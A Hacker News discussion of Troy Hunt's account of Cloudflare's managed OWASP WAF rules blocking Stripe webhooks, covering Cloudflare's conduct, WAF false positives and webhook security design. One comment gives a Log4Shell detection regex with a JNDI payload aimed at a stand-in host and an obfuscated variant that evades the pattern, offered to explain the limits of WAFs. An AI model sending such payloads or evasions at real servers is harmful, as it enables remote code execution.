Down the Cloudflare / Stripe / OWASP Rabbit Hole (troyhunt.com)
269 points by mdhb on Feb 20, 2023 | 127 comments


This boils down to 'Cloudflare did something' and without the Enterprise plan you'd never be able to pull the data required to diagnose the problem. Oh also, Cloudflare knows they did something but plays the blame game until you get to someone that openly acknowledges that they know something is broken.

I've said it before and I'll say it again--Cloudflare is not making the Internet safer, it's just making it less open. I know that is not the overwhelming sentiment of HN and me complaining about it isn't going to change anyone's mind.


As a bit of a meta point it’s a bit astonishing how good Cloudflare is at PR and community management. The sentiment I’ve seen here in the past is overwhelmingly pro-Cloudflare. Every now and then they’ll publish a hit piece on AWS here and there’ll be an AWS hate thread, but no one seems to question Cloudflare’s motives for promoting bad press about their competitor directly to their target market.

Then again in most things, the underdog trying to upstage the incumbent is always a popular narrative. You’re right that talking about it likely isn’t going to change any sentiment.


HN is like any other community and is thoroughly captured by some hype machines (Cloudflare, the language that shall not be named) and virulently opposed to others (cryptocurrency)


What are you talking about? Java doesn't have a hype machine...


> it’s a bit astonishing how good Cloudflare is at PR and community management

It's really not. Look at any cloudflare support thread here and how they crawl out of the woodwork for damage control because they failed at basic customer service.

it's a huge red flag, and everyone in the comments always sees it.

cloudflare is cancer and needs to die.


> Cloudflare is not making the Internet safer

I am certainly not a fan of Cloudflare and wouldn't use their services, but I think this is not an accurate statement. Their services do objectively provide a security benefit. The only question is really whether or not the cost/benefit ratio is favorable.


Only if you discount the impact on users who are blocked, like those on VPNs, or myself (Cloudflare seems to dislike my ISP), and who have no recourse.


That sort of thing falls into the "cost" category.


Yes, even considering this, the benefits outweigh the costs. I use a Cloudflare competitor at my work. Ideally, all APIs would never have security issues and would always have amazing rate limiting. In practice, this is never the case. What I use stops low-skilled attacks on the scale of millions of malicious requests per day, against thousands of false positives (still way too high). In addition, when a high-skilled attacker finds a massive hole, it slows them down so that they get thousands of requests in vs millions. It also lets you block them much faster than a new deployment would, and gives you another way to detect them. Are there other ways to do this? Yes. By the time you've implemented everything, will hackers have stolen millions of dollars from your customers? Probably.


Try getting a fresh IP from your ISP. I had a single IP that was blocked (incredibly annoying, and apparently impossible to have cloudflare fix it), but triggering a DHCP change caused me to get a good one.


They use CGNAT; having even a dynamic IP that's all yours for a few days is sadly becoming a thing of the past as the IPv4 address crunch grows worse but Western ISPs and enterprises still procrastinate on IPv6 adoption.


Overall I agree with you - the only caveat I have to offer is Cloudflare's support of eSNI. My opinion on CF used to be quite black and white, but there is at least someone in there (for who knows how long) contributing to the actual security of the web. Not mutually exclusive with doing harm in other ways.


And don't forget, if they don't like you, they will happily deactivate your account with no notice and no reason given.


Bit hyperbolic, no? Maybe rephrase to "if you engage in Neo-nazi hate crime and promote real world harm, they'll deactivate your account after much internal deliberation on their role as gatekeepers and will publish a post with clearly stated rationale"?

I'm not advocating Cloudflare, but I do think we need to be fair when judging stuff like this.


"Let me be clear: this was an arbitrary decision. It was different than what I’d talked talked with our senior team about yesterday. I woke up this morning in a bad mood and decided to kick them off the Internet."

https://gizmodo.com/cloudflare-ceo-on-terminating-service-to...

Can you clarify where the "much internal deliberation on their role as gatekeepers" was?


The above comment is referencing the actions taken in 2022 against Kiwifarms; your article is from five and a half years ago; Cloudflare's internal processes have matured a lot in that time.

Moreover, it's really worth driving the point home that Prince's point in that cherry-picked statement was to (dramatically) shine a light on the fact that he could do that. Cloudflare does not do that often; that's why it makes headlines when they do. Other tech companies do similar things far more often, daily in some cases. He, then and now, has been an advocate for ceding responsibility for these decisions to governments. The issue, then and now, is that our government is woefully inadequate in keeping the internet safe. Threats coordinate at the speed of light and cross country borders; in the Kiwifarms case, the US government wasn't able to put together a case fast enough to keep Kiwifarms' targets safe. Also, I'm sure the public outrage in that case helped push a decision in one direction.


First, the phrase "cherry-picked" implies that something has been removed from a context which changes its meaning. The quote I shared was from an email that Prince sent, and if anything, the full context enhances the point I was making.

Second, the fact that tech companies "do similar things far more often" is not a good thing. Creating an internal committee and slapping the words "trust and safety" on it does not replace due process. These big tech companies are role-playing as governments, but they are terrible at it, and when they fail, they face no consequences.

As far as "government is woefully inadequate in keeping the internet safe," is that really what you want the government to do? How far should the government be able to do to enforce "safety"?


> These big tech companies are role-playing as governments, but they are terrible at it

If actual governments did it, they wouldn't have to. I bet they'd be thrilled to be relieved of that responsibility.

> As far as "government is woefully inadequate in keeping the internet safe," is that really what you want the government to do?

Someone has to do it. I'd rather it be done by a government, who have to pay at least some attention to public sentiment, than by major corporations, who do not.


I think we may have a different view on what the purpose of a government is. Would you be ok with the military forcefully entering a tech company, pointing guns at the employees, and forcing them to do something? Because in my opinion, that is precisely what the law does, in an abstracted sense.

Also, I have absolutely no interest in a government keeping people "safe." That sentiment only leads to license for governments to violate privacy and control the lives of private citizens.


> I think we may have a different view on what the purpose of a government is.

Perhaps. I also suspect that we have a different view on what government actually is.

> Would you be ok with the military forcefully entering a tech company, pointing guns at the employees, and forcing them to do something?

I think representing all actions of government as being the equivalent of this is reductionist to the point of absurdity.

From my point of view, there will always be (and has to be) rules about how we interact with each other. The question is who will develop and implement those rules. Call it a necessary evil if you wish.

I prefer those rules be developed and implemented by us, collectively, because then we have at least some amount of influence over the process. If it's not done that way, it will be done by powerful entities such as corporations (or, in a maximally degenerate situation, warlords or mobs), where we have little to no influence over the process.


Your description of what happened is a bit hyperbolic as well. I remember this event, but the details are pretty fuzzy. IIRC, it stirred up so much controversy precisely because no US laws were broken. So saying "engage in Neo-nazi hate crime and promote real world harm" is inaccurate. The content was garbage, no doubt about it. But let's not get hyperbolic in the other direction either.


> no US laws were broken

People keep confusing private organizations and governments. They don't need to break any laws to become undesirable customers, and any private company that tolerates these kinds of customers does so at its own discretion. The world doesn't owe them a right to be awful people, but they can still be awful if they accept the consequences.


The problem I have with CloudFlare is that their definition of "undesirable customer" includes forums engaging in hateful, virulent, but ultimately legal speech, but does not include forums that are selling methamphetamine and stolen credit card numbers.


I'm not confusing anything. Cloudflare's stance was that they'd serve anything that wasn't illegal, and one day they decided to change that. Of course that's their prerogative, but I'm just explaining why it stirred up so much controversy.


"no US laws were broken" != lacking in harmful activities.


I don't think "happily" has the right implications for an action they have taken three times ever.


Source?


> Cloudflare is not making the Internet safer, it's just making it less open.

They're doing both, eh?

I switched my family's home DNS to Cloudflare's family-safe DNS ( https://blog.cloudflare.com/introducing-1-1-1-1-for-families... ) to protect them from malware and porno. (I'm not a prude; they don't use the Internet for that. No really! We are weirdos. And porn sites are often a malware vector anyway.)

A few months ago I noticed that you can't browse weed stores through their DNS anymore.

I don't really blame them; I'm assuming it's due to pressure from the US Federal Gov. (who still consider pot to be some insanely dangerous narcotic!). But it was definitely a personal "until they come for you" moment.


This sounds like perfectly reasonable behavior, not needing any pressure from government agencies.

I would assume that anything purporting to filter the internet to be "family safe" would exclude weed stores, as well as liquor stores, tobacco stores, and anything else that most people would consider inappropriate for children.


Well, that's as may be, but it says on the tin "malware and porno" and weed is neither, eh?


Liquor stores? In multiple states every grocery store is a liquor store…


Cloudflare isn't really to blame here when the customer has FULL control over all security settings - they can define rules as they please, and have all the tools (including the API) to do this


Huh? In this case, CloudFlare updated the OWASP ruleset, causing Troy's payments integration to break.

That's not nice DX in my opinion.


Customers should be aware that they are relying on Cloudflare-defined rulesets and should understand that those change.


This sounds like victim blaming, honestly. If Troy Hunt, one of the most well-known security researchers around, who's been running HIBP for almost a decade now, ends his blog post with effectively a shrug saying "I dunno what happened", how is any reasonable customer without access to the Enterprise plan supposed to debug any of this, especially when Cloudflare themselves barely admitted fault? They even tried rolling back the OWASP ruleset and it didn't change a thing. He had to manually add the exceptions to the firewall. This is arguably terrible DX.


I feel like Cloudflare could do a lot better at letting the customer know they are using rules managed by Cloudflare and how that affects their traffic. But at the end of the day, enterprise customers should be experts at this (and in many cases have people employed whose job is literally this) - and they have all the tools available to them.


If even Cloudflare admits the error, doesn't know what triggered it, and hadn't fixed it by the end of the post (Troy had to bypass it with manual intervention), I genuinely don't understand how you expect "experts" to deal with this. This just feels like a non sequitur.


See also: Cloudflare in front of Mastodon.

A lot of naive Mastodon admins are putting default Cloudflare configurations in front of their instances. The problem is that inter-instance requests necessary for federation then get caught as bots (because they essentially are) and connections in the network degrade, causing eventual de-federation.

Cloudflare is magic, in the good and bad ways. I'd only use it for very small personal sites or things that can afford downtime and don't need integrations, or for large businesses that can afford the enterprise plans and will actively manage the account and respond to business and tech needs with config changes.


Are there any public reports of this? It’s not something I’ve seen anywhere and not my experience. I “googled” it and all that came up was your mastodon post saying the same thing.


I wonder if their Wildebeest ActivityPub implementation will have similar issues.


"very small personal sites" don't need Cloudflare.


Any site should be able to survive DDOS.


With which strategies would "any site" survive DDoS without paying Cloudflare or some other middleman?


That was my point.


Most small websites will never get attacked.


What I find bleak about the situation is that it is a glaring design fail, even though everyone involved should have the necessary expertise to do better. A callback from your payment provider should never go through a best-effort WAF. Instead, as you already have a strong business relationship, you could easily exchange/store/configure strong credentials with Stripe [1]. When even a security professional doesn't do that, what does it say about the state of documentation of this feature?

Looking at the documentation directly, what they advise you to do is kind of the worst idea they could come up with: https://stripe.com/docs/webhooks/signatures – you need custom logic[2] to verify that their MAC ("signature" they call it incorrectly) is valid and you need to configure a different secret for each of your endpoints. And then you still need to handle replay attacks somehow, which is its own nightmare to do correctly. It's no wonder the WAF can't do that for you.

From personal experience a few years old, I'm really irritated by Stripe's webhook approach overall. Payment process information is such a vital business concern that "let's try to call them and if that fails... well we tried" is broken on principle alone. The obvious approach is to have an event list which you as customer long-poll or just poll every few seconds if your framework doesn't support async well. This is also trivial to do securely: your HTTPS library already authenticates Stripe during the TLS handshake, and that is all that is necessary.

[1] Best case scenario: Let Stripe authenticate with mutual TLS, but I know this is quite a long way away from typical web server configurations.

[2] Stripe's approach very much reminds me of DPoP https://news.ycombinator.com/item?id=31266575 which shall in no way be construed as a compliment.


I just would like to give my opinion on some of your points, which I don't agree with:

> Looking at the documentation directly, what they advise you to do is kind of the worst idea they could come up with: https://stripe.com/docs/webhooks/signatures – you need custom logic[2] to verify that their MAC ("signature" they call it incorrectly) is valid and you need to configure a different secret for each of your endpoints

It certainly helps that I use their official SDK, but it's one line of code to add the signature validation. Also, I'm not sure why you would want to create a lot of endpoints to listen to these webhooks. I simply have one, and the Stripe SDK helps me determine the event type, deserialize it, etc.
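
For the curious, a minimal sketch of that validation (official stripe-python SDK in a Flask app; the route and env var name are illustrative, and exact exception names vary slightly across SDK versions):

    import os

    import stripe
    from flask import Flask, abort, request

    app = Flask(__name__)
    endpoint_secret = os.environ["STRIPE_WEBHOOK_SECRET"]  # per-endpoint "whsec_..." value

    @app.post("/stripe/webhook")
    def stripe_webhook():
        payload = request.get_data()  # raw bytes: the MAC covers the exact body
        sig_header = request.headers.get("Stripe-Signature", "")
        try:
            # The advertised "one line": checks the HMAC and the embedded
            # timestamp (Stripe's replay mitigation) in a single call.
            event = stripe.Webhook.construct_event(payload, sig_header, endpoint_secret)
        except (ValueError, stripe.error.SignatureVerificationError):
            abort(400)  # tampered, mis-signed, or stale payload
        return "", 200  # event["type"] tells you what happened, e.g. "invoice.paid"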

> Payment process information is such a vital business concern that "let's try to call them and if that fails... well we tried" is broken on principle alone

That's not how it works. The webhooks keep retrying with exponential backoff until they succeed. You can also manually retrigger them for individual events.

> The obvious approach is to have an event list which you as customer long-poll or just poll every few seconds if your framework doesn't support async well

Nothing is preventing you from doing that. In fact, in my codebase I do polling of the Stripe API as a fallback to check if a payment is successful in case there are issues with webhooks. But it's nice to have the webhook telling you immediately if a payment fails/succeeds, in order to give the user fast feedback about the status of their payment (and not wait for the next long-polling iteration).
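
A minimal sketch of such a fallback (stripe-python assumed; the key and ID are placeholders):

    import stripe

    stripe.api_key = "sk_live_..."  # placeholder

    def payment_succeeded(payment_intent_id: str) -> bool:
        """Ask Stripe directly rather than trusting that every webhook arrived."""
        intent = stripe.PaymentIntent.retrieve(payment_intent_id)
        return intent.status == "succeeded"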

Not everything on Stripe is perfect, but I do find it really pleasant to work with in general


Thanks for your remarks and corrections.

While what you say is correct, it doesn't apply to the problem Troy Hunt faced. What he needs is DDOS protection on his API. The request authentication Stripe provides is too complicated to be checked by the web application firewall.

The (edit:) pragmatic approach is to

a) not use webhooks or

b) let Stripe connect to you via HTTPS (to prevent replay attacks and leakage of the secret URI), give Stripe a secret URI, whitelist the secret URI in the WAF and verify the payload MAC via the official SDK.

> in order to give feedback to the user fast about the status of his payment (and not wait the next long polling iteration)

Nitpick: The long poll / Server Sent Event should respond immediately once there is new data available, so it should not be slower than the webhook.


> b) let Stripe connect to you via HTTPS (to prevent replay attacks and leakage of the secret URI), give Stripe a secret URI, whitelist the secret URI in the WAF and verify the payload MAC via the official SDK.

IMHO the long-term best architecture would be HTTPS client certificates / mutual TLS auth: you would just whitelist so that only clients signed/approved by Stripe can connect to that Stripe-callback endpoint.
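
A minimal sketch of the idea using only the Python standard library (the CA bundle name is hypothetical; Stripe doesn't publish a client CA for webhooks today, which is rather the point):

    import http.server
    import ssl

    # Any client that cannot present a certificate signed by the trusted CA
    # is rejected during the handshake, before a single request byte is read.
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(certfile="server.pem", keyfile="server.key")
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.load_verify_locations(cafile="stripe-client-ca.pem")  # hypothetical bundle

    httpd = http.server.HTTPServer(("0.0.0.0", 8443), http.server.BaseHTTPRequestHandler)
    httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
    httpd.serve_forever()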


Maybe, but the feasibility takes a huge dive, because you now need the application to terminate TLS (or additional configuration for the route wherever TLS is terminated), plus a flow to rotate certificates.


From memory, I think that's how Twilio callbacks work.


> The obvious approach is to have an event list which you as customer long-poll or just poll every few seconds

This is also much much easier for the payments integrations developers to test, compared to all the messing about and running dodgy proxies that testing webhooks involves.

Webhooks for critical application paths just seem like a bad idea all around really


> Webhooks for critical application paths just seem like a bad idea all around really

Well put. I've been deep in the Stripe API for a while now, and the invoices API provides up-to-date account status information and what a customer is paying for. This can be referenced as needed and, if desired, cached with some TTL and referenced as the "truth." Then webhooks can be viewed as a convenient way to bust the cache quicker than waiting for the TTL to expire.

It could be better, but it provides the necessary information without relying on webhooks.

An example of how we use this API as a form of entitlement checks at Tier can be found here: https://github.com/tierrun/tier/blob/f7c32426d30ca314706ca7e...
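
A rough sketch of the pattern (stripe-python assumed; the TTL and cache shape are mine, not Tier's actual implementation):

    import time

    import stripe

    _cache: dict[str, tuple[float, list]] = {}
    TTL_SECONDS = 300

    def customer_invoices(customer_id: str) -> list:
        """The invoices API is the 'truth'; cache it with a TTL."""
        hit = _cache.get(customer_id)
        if hit and time.time() - hit[0] < TTL_SECONDS:
            return hit[1]
        invoices = stripe.Invoice.list(customer=customer_id).data
        _cache[customer_id] = (time.time(), invoices)
        return invoices

    def on_webhook(event: dict) -> None:
        """Webhooks only bust the cache early; they are never the source of truth."""
        _cache.pop(event["data"]["object"].get("customer", ""), None)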


You should not poll a payment provider in a general flow. Do you realize how many requests that would cause if everybody did it? A payment flow is event-driven by nature. The payment provider pushes the states back to the initiating system. If that fails, it is up to the consumer to detect problems and make sure that the system is in sync with the provider. Some payment providers keep retrying pushes for at least 24h. It is an obvious design flaw...


Yeah, Stripe is well documented but very ugly to actually handle in practice.


There are multiple places where he uses a feature only available to enterprise users (read: Not me) to resolve this. I guess the "normal" thing here would be to disable the WAF and be done with it.


This jumped out at me too. Cloudflare keeps many diagnostic and debugging tools available only on the Enterprise plan (typically >$3k per month). When something like this happens to most small teams and startups, they are working in the dark even on the Business plan at $200/mo.


FWIW CloudFlare has worked with us time and time again to get pricing in line with our expectations. We have numerous "Business Plus" or "Free Plus" plans across various accounts and zones that include features that are, as listed in the marketing, only available to Enterprise.

Just reach out to someone at Cloudflare. I'm sure they'd love your business.


And a WAF isn't the only design option for webhooks. WAF = define what to block. Another option is to define what to accept (and block all else by default).

OpenZiti approach (1) for example:

a. enroll each side of the webhook w/ X.509 identity

b. X.509 gates a network overlay between the servers

c. each server initiates outbound sessions to the overlay

d. block everything else (deny-all inbound on both servers)

(1) disclosure: i am a maintainer of the openziti foss, and you can only (fully) use the technique above if you have enough control of both sides, e.g. use a Lambda function: https://blog.openziti.io/my-intern-assignment-call-a-dark-we...


Mutual TLS auth seems like such a no-brainer for APIs like these.

I do wonder, though, how does OpenZiti deal with client certificates expiring? Do you not set/enforce an expiration date or do you have some kind of automated renewal mechanism?


your overlay network fabric infrastructure - ziti edge routers - leverage the ziti edge client API to submit CSRs for new certs x days before expiry.

for client endpoints, there are currently 2 choices and at least 3 in the future:

1. admins choose to enable client endpoints to continue to auth with expired client certs. the admin revokes access (when necessary) at an endpoint level or at a service level (least privileged access) via those constructs, rather than cert constructs.

2. admins don't permit expired certs to be used. the admin is managing the certs.

3. as a third choice for client endpoints, ziti has plans to enable admins to use the API used by the fabric infra mentioned above. this is future, with timing mainly dependent on openziti community priorities and related work.


Cert renewal is why it's not used everywhere, I think. While OAuth2 / client credentials is complicated, at least .jwks endpoints make cert rotation easy.
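
For contrast, a sketch of the JWKS flow (PyJWT assumed; the issuer URL and audience are placeholders), where rotation is invisible to the consumer:

    import jwt
    from jwt import PyJWKClient

    jwks_client = PyJWKClient("https://issuer.example/.well-known/jwks.json")

    def verify(token: str) -> dict:
        # The key set is fetched (and cached) from the issuer, so keys can be
        # rotated server-side without any consumer-side reconfiguration.
        signing_key = jwks_client.get_signing_key_from_jwt(token)
        return jwt.decode(token, signing_key.key, algorithms=["RS256"], audience="my-api")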


yes, can be tricky, as you state. see above for the openziti approach.


The problem is that you have to hope this doesn't encourage the developers to lapse on RBAC and let an authenticated client do everything.


absolutely. in the case of openziti, the x.509 is the first authentication gate (optionally paired with ziti posture checks and mfa). everything from there is least privileged, attribute-based access, at a service level. default is closed - access to no services (even if authenticated at the level of the private ziti network fabric overlay).


Yeah, while I would have tried to investigate this a bit, this seems to be an issue on Cloudflare

Bypassing the rules is a workaround, but not a fix


And if you have to disable WAF, what exactly is Cloudflare doing for you?


Even with the WAF disabled (at least as much as I can disable it without the Enterprise plan, i.e. "Essentially Off"), I've found it will still block legitimate requests. Tainted CGNAT or dynamic IPs are my guess.

The WAF doesn't really matter for my use case as the route is handled by a CF worker, in fact I'd prefer it doesn't get in the way.


Edge Cache with unmetered egress?


unmetered up to a point, but yeah. Also network-level DDoS protection


If you are reaching the point where they are sending you emails asking about what you are doing, you should be paying for it.


In the article, the author disables the WAF only for Stripe outbound IPs, which can be presumed to be safe (unless Stripe's machines/IP space gets hacked). The WAF still works for traffic from all other IPs
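
Stripe also publishes that list in machine-readable form, so the allow rule can be generated rather than hand-maintained. A sketch (the JSON URL and "WEBHOOKS" key are what Stripe's IP docs described when I checked; verify them before relying on this):

    import json
    import urllib.request

    # Published list of source IPs Stripe uses for webhook deliveries.
    with urllib.request.urlopen("https://stripe.com/files/ips/ips_webhooks.json") as resp:
        ips = json.load(resp).get("WEBHOOKS", [])

    # Cloudflare filter expressions use a space-separated set for "in".
    expression = "(ip.src in {%s})" % " ".join(ips)
    print(expression)  # paste into a WAF exception scoped to the webhook path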


yeah, but sadly there aren’t many CDNs that offer WAF, even the most basic one. I literally begged bunnyCDN to build one so we can switch from CF. It’s on their roadmap for like forever.


Would it still do DDoS protection even without the WAF?


Our DDoS mitigation is separate, yes, and will still work.


I wonder what the takeaway from this is? The simple one is "bad cloudflare" or "bad stripe" or even "bad hibp". Or maybe all in conjunction. Or maybe none.

But that seems simplistic to me. The smell of this is a system that is so poorly made that it has layer upon layer of obscure hacks to protect it. It appears that no one can understand why this happened, and the best guess is that it had something legitimate that was misunderstood. Maybe the words "alter" and "table"? This is the equivalent of you walking into a bank, telling the person "Hi my name is Rob and I came to the bank today to ..." and then the bank going into automatic shutdown.

This is broken. IMHO.


From the information given, bad Cloudflare. These kinds of content-matching rules should trigger deterministically and be testable in a hermetic test environment. They also have sample payloads that get blocked vs. ones that get through, despite being essentially identical. It should be about as easy to debug as it gets.

That it's tricky to debug suggests there's something totally different going on, not just badly understood rules. Maybe a server with a hardware fault that's making it return bogus results (though that should be easy to find in monitoring), maybe some kind of race condition, or different rules running in parallel with global or request-scoped state such that the order in which the rules finish running matters.


From someone else in the article's comments:

> if we treated the customer's phone number as a hex representation of ASCII, it spelled something that was recognisable as a command.

And the WAF team suggested they ask the customer to change their phone number.

Goodness me.


Case 1. It blocks my SQL playground due to SQL injections: https://play.clickhouse.com/play?user=play

- solution: disable WAF.

Case 2: It damages my presentations by removing whitespaces in HTML elements styled as "white-space: pre" at https://presentations.clickhouse.com/

- solution: disable auto minification.

Case 3: It makes the debian packages repository inconsistent https://packages.clickhouse.com/

- solution: disable caching.

In fact, Cloudflare is an amazing service - it is powerful and easy to use; you only have to take care when enabling and disabling its features.


This is absolutely not the first (or second) time I've seen an outage triggered by a well-meaning security rules update on a WAF.

To be honest, a lot of security-related deployment processes would be regarded as unacceptable, wild-west level shit if they occurred in the software lifecycle - like the difficulty of identifying that a change had even occurred, the inability to see the before/after for the change, release processes effected manually via consoles, changes deployed directly to production without going through a lower environment, and big-banged as opposed to canaried, etc.


> About Page: “I'm Troy Hunt, an Australian Microsoft Regional Director and Microsoft Most Valuable Professional for Developer Security. I don't work for Microsoft, but they're kind enough to recognise my community contributions by way of their award programs which I've been a part of since 2011.”

Can someone explain what this Microsoft Regional Director role is? Because it sounds like he works for Microsoft, but then he says he does not.


Microsoft Regional Director is effectively someone who is an advisor to Microsoft - https://rd.microsoft.com/en-us/about/ .


That's a really stupid choice of title for essentially a "Key Partner"


Ignoring the question of who is actually doing something wrong, and the fact that most customers on lower tiers wouldn't even be able to get most of the presented information, it seems absurd to me that a customer on an Enterprise plan that costs thousands of dollars a month can't get a simple "this is why those requests trigger the firewall" answer from CloudFlare. The diff between the request that passed and the one that triggered the rule is simple enough, and the WAF is not some opaque AI, I hope.

Why can't the triggering request be replayed through the WAF with output that shows the scores for each bit?


My first thought is - why is this traffic going through CloudFlare at all? There's no caching benefit and it's all going to be coming from a datacenter anyways.

Maybe it's more trouble than it's worth to bother setting up a separate non-CDNed DNS for API routes for this particular site. But then how much time was spent trying to sort out why those requests were being blocked?


Cloudflare blocks denial of service attacks, too, which is probably important for tools in the security space, and blocking denial of service attacks means making sure that attackers don't know how to bypass Cloudflare and hit your origin directly.

If you let things go direct to the origin, then you're giving away information about where the origin is, even if the things are only Stripe.


That's true, but it seems pretty low-risk to me, since only Stripe and maybe a few other services you're integrating with actually know the DNS name. It's possible someone could discover it and attack it, but I think I'd wait to see an attack actually happen that couldn't practically be mitigated otherwise before moving it behind Cloudflare etc.


I've been running the OWASP coreruleset in production for about a year now and it has been a big pain. The way I made it manageable was 1) training users that "if you see a 403 error, tell me ASAP" and 2) learning the ModSecurity rule syntax to be able to create rule exceptions for users very quickly. This is not possible to do at Cloudflare's scale.

Even then, users who didn't know the intricate details of the Web Application Firewall (like Troy in this case) would waste hours hunting down the issue. Since less popular sites often have more illegitimate traffic than legitimate traffic, there was really no good way for me to proactively fix WAF issues.

The conclusion I have drawn is that WAFs really only have a few very narrow use-cases.

The main use-case is when you want to write your own rule to protect hosts from a specific zero-day while they are being patched. A simple rule to detect Log4J [1] was an effective band-aid while we scrambled to implement real patches. But WAFs have an inherent weakness: clever attackers can pretty much always circumvent rules, or force you to write a rule that is so complex that it causes slowness or blocks legitimate traffic.
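
A sketch of that kind of band-aid (illustrative only, not the actual CRS rule), which also shows how quickly the circumvention game starts:

    import re

    # The classic Log4Shell indicator: a "${jndi:" lookup in any inspected field.
    LOG4SHELL_NAIVE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

    def looks_like_log4shell(value: str) -> bool:
        return bool(LOG4SHELL_NAIVE.search(value))

    assert looks_like_log4shell("${jndi:ldap://evil.example/a}")
    assert not looks_like_log4shell("ordinary log message")
    # ...but nested-lookup obfuscation sails straight past the naive pattern:
    assert not looks_like_log4shell("${${lower:j}ndi:ldap://evil.example/a}")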

Another use-case is when you have to deploy some untrusted code that is likely vulnerable to common (>1 year old) vulnerabilities. Like running an old/archived wordpress instance. This is the only time when the coreruleset makes sense IMO.

As I see it, WAFs are a tool created in a simpler time when the number of possible attacks and applications was small. In the modern era, where there is a constant deluge of zero-days, huge attack surfaces, tons of variability in applications, and lots of sites where RCE/SQLi is a feature (think CI job definitions, Jupyter notebooks, custom query languages), WAFs have lost their effectiveness.

[1]: https://github.com/coreruleset/coreruleset/issues/2331


We whitelisted the stripe IPs completely after getting burned once. If Stripe gets hacked so that the hackers jump off to our site, we have far bigger problems to worry about.


It seems like Cloudflare should be doing this for you. It wouldn't be hard for them to keep a list of IPs from common known-good integrations. They could prompt on first hit to ask you if you want to allow-list those companies, or even just do it by default.


Can you imagine the firestorm that would happen if CF was found to be allowing traffic from certain other entities, no matter how trustworthy they're perceived to be, to bypass security controls by default? And the firestorm would be entirely warranted.


I see your point, but I think there is a version of this that would be fine. I imagine these rules would be shown in the product so users can see the configuration and override it, perhaps it's an explicit opt-in, perhaps there's a public application process for inclusion or some sort of stated conditions so that it's not seen as too political which services are chosen... there are lots of options.


I agree. I was really responding to having such a pass be enabled by default. The defaults for any security system should be toward maximal security. Users being able to loosen the rules to fit their situation is fine and desirable.


Running a WAF with a dynamic ruleset between you and your payment provider seems a bit risky to me.


Using a third party's WAF and trusting it not to log your data also carries some risk.

By centralizing all data going through the web you paint a massive target on yourself (for black hats).


WAF blocking things randomly isn't a good look for Cloudflare. I wonder how many outages this has caused for their customers.


From my experience, rules randomly blocking things is essentially a feature of WAFs. I have random issues with WAFs all over the place, from different providers on different projects.

And yep, disabling the WAF was always a good enough solution until we figured out which parts of the request were triggering rules.


I’ve generally thought that POST webhooks are the wrong abstraction for this type of payment confirmation, and reading this makes me believe it even more:

This whole process needs something like a message queue. Stripe should publish an event to the queue, and HIBP should receive that event. A message queue is still subject to network failures, but any sensible implementation will notice and recover missed events.


The queue/DLQ in this case is on Stripe's end. Once the WAF problem was fixed, Stripe ran the webhooks correctly.


With a real queue, dropping one message on the underlying transport will either be detected quickly and obviously on both ends, or will be recovered automatically, or both.

The implementation could be as simple as a queue id and sequence number in the POST along with a way to request replay (via GET to Stripe) of old messages indexed by the same id and sequence number and a way to periodically ask for the latest sequence number.
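
A sketch of that consumer side (every path and field name here is hypothetical; Stripe exposes no such replay API today):

    import requests

    last_seq = 0  # would be persisted durably in real life

    def process(event: dict) -> None:
        ...  # application logic

    def handle_delivery(queue_id: str, seq: int, body: dict) -> None:
        """Detect gaps in the sequence and replay whatever was dropped."""
        global last_seq
        for missing in range(last_seq + 1, seq):  # empty when nothing was missed
            replayed = requests.get(
                f"https://payments.example/queues/{queue_id}/messages/{missing}")
            process(replayed.json())
        process(body)
        last_seq = seq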


Damn, this is absurd. Is there not a way on Cloudflare to flag webhooks with an "if request contains this API key, let it through, block the rest"?


It looks like "WAF - add exceptions" supports Wireshark style expressions, so there's things like:

(http.request.uri.query contains "some-string")

Or similar for checking headers, post body content, etc.


You can create custom rulesets, which is what the article's author did. This allowed the API calls to essentially bypass the WAF.


just remember sometimes cloudflare adds new features which aren't controlled by existing rules

"security off for this ip?" "I guess you don't mean our new shiny feature!"


"I look at the managed WAF Cloudflare provides more favourably than I did before simply because I have a better understanding of how comprehensive it is. I want to write code and run apps on the web, that's my focus, and I want someone else to provide that additional layer on top that continuously adapts to block new and emerging threats. I want to understand it (and I now do, at least certainly better than before), but I don't want managing it day in and day out to be my job."

My takeaway from this is actually that you can't just have a managed WAF that gets out of your way. This looks like it took easily a day or more of work. What's the advantage of using a CloudFlare "managed" WAF versus running your own within AWS? I guess the "infrastructure" is managed, but the operations aren't...

I'm a pretty experienced engineer, and I honestly don't know if I'd have been able to solve this issue personally. Most likely I would have just whitelisted all of Stripe's IP's, like the initial hotfix did.


Working around WAFs for years in enterprise support, I can tell you this kind of crap happens all the time. In my current work we'll have a client try to access our app in some way that oddly explodes. In general a browser HAR file is very useful. Then we have to check our app (hosted on the customer's servers), then we have to look at the load balancer, and when that doesn't bear results it's quite often that we find a WAF in the network path. Most of the time it's near impossible to find the team that manages it and then get helpful information out of them about the issue.


It's like complex systems have complex failure modes, who'd thunk?


I have used a few different WAFs to date: AWS WAF, Cloudflare WAF and Akamai WAF. I have had issues with all of them, but the most frequent issue is an unexpected blocking of requests. It would be interesting to benchmark a set of WAFs to see which ones block threats vs which block valid traffic.


A funny one that comes up is that many WAFs either block large POST requests outright or only examine their first X bytes, for performance reasons.

So take your pick: unpredictably lost requests, or a loophole where the WAF is blind.


Came across similar situations before [beyond previous issues with getting recognized as a trusted bot by Cloudflare].

The destination website user was wondering why our service didn't visit their website and why we were receiving 503s in return, with CF in the middle. Turns out in this case it was an additional bot blocking service they'd installed on their own server, which I'd presume is hard for them to debug if the request never reaches them (but in this case it did, just added confusion for them).

Far from ideal to have a middle man arbitrate a web request or decide what is trusted. On the flip side, lots of rogue traffic that should be blocked. Think in some cases the WAFs are just a bit too aggressive with the grey area and UAs they don't know. It creates a barrier of entry to new players.


Definitely, Stripe should have done a better job here. However, this also points to the risk of allowing service providers to handle your security. Maybe there should have been a backtest, and/or a maker/checker control for pushing new security rules.


Cloudflare is blocking the shit out of legitimate requests; how is this Stripe's fault?

Putting the webhook callback behind CloudFlare was the mistake IMO.


Yes - Stripe is even nice enough to provide a list of IP addresses their webhook requests could come from [1]

And Cloudflare is well known for randomly throwing up "Checking your browser before accessing example.com" interstitials and captchas and suchlike - of course you don't want bot detection on your callback API.

[1] https://stripe.com/docs/ips?locale=en-GB#webhook-notificatio...


A customer I work with has a large Drupal site hosted with a big-time Drupal provider. Cloudflare has decided that image uploads from the browser via the JS uploader need to be checked and injects itself into that... but the browser has no way to display it, so the page just hangs. It's awful.


